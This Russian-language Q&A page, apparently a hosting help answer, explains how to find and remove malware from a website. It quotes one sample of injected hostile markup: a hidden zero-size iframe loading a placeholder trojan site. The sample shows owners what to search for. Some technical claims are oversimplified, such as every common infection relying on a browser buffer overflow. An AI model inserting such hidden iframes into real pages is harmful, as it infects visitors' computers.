Как найти и удалить вирус на сайте?
от

1 Ответ

Наличие вирусов на сайте очень опасно не только для посетителей, но может стать причиной блокировки сайта в поисковых системах.

Первым делом проверьте свой компьютер на наличие вирусов с помощью антивирусных программ. Пароли доступа FTP обычно воруют вирусы-трояны, которые заразили ваш компьютер или компьютер другого человека, знающего доступ FTP к сайту. После того как компьютер был проверен и очищен от вирусов необходимо сменить пароли к FTP.

Следующим и очень важным этапом является «лечение» непосредственно сайта от вредоносного кода (вирусов). Прежде, чем искать вирусы на сайте, необходимо знать как они выглядят и где именно их следует искать.

Существуют всего несколько самых распространённых кодов вирусов, которые используются для размещения на страницах сайтов. Все они используют одну и ту же уязвимость переполнения буфера браузеров. Уязвимость заключается в том, что с помощью специального кода (iframe) можно незаметно загрузить и запустить на компьютере жертвы любой файл. Первое, на что следует обратить внимание — это подозрительный HTML код с подключением <iframe>.

Пример кода вставки вируса:

<iframe src="http://адрес_сайта_с_трояном/" width="0" height="0" style="hidden" frameborder="0" marginheight="0" marginwidth="0" scrolling="no"></iframe>

Как правило, заражению подвергаются файлы PHP скриптов (в названии таких файлов используется расширение php) и обычные HTML страницы (расширение html или htm). Следует обращать внимание на дату модификации файлов. Посмотрите, какие из файлов были изменены совсем недавно. Если файлов на сайте немного, то их все можно просмотреть вручную и визуально найти подозрительные коды HTML или JavaScript, которые нужно будет удалить.

Если вредоносный код на сайт был добавлен несколько дней назад, то решить проблему с его очисткой можно путём восстановления файлов сайта из резервной копии. Заявку на восстановление можно подать через раздел "Резервные копии" панели управления.

Чтобы защитить свой компьютер и обезопасить сайт против такого рода взломов достаточно иметь выход в интернет и немного средств на покупку лицензии антивирусной программы.

Обращаем ваше внимание на то, что часто вредоносный код добавляют, используя уязвимости в скриптах вашего сайта. В данном случае, решить такую проблему можно путём обновления их к последней стабильной версии, если их разработчики следят за своей системой и вовремя закрывают обнаруженные «дыры».

Дополнительная информация:

Как вылечить зараженный сайт 
Как защитить сайт от заражения 

Убедившись, что вредоносный код и содержание полностью удалены с сайта, можно запросить проверку на наличие вредоносного или нежелательного ПО от Google

от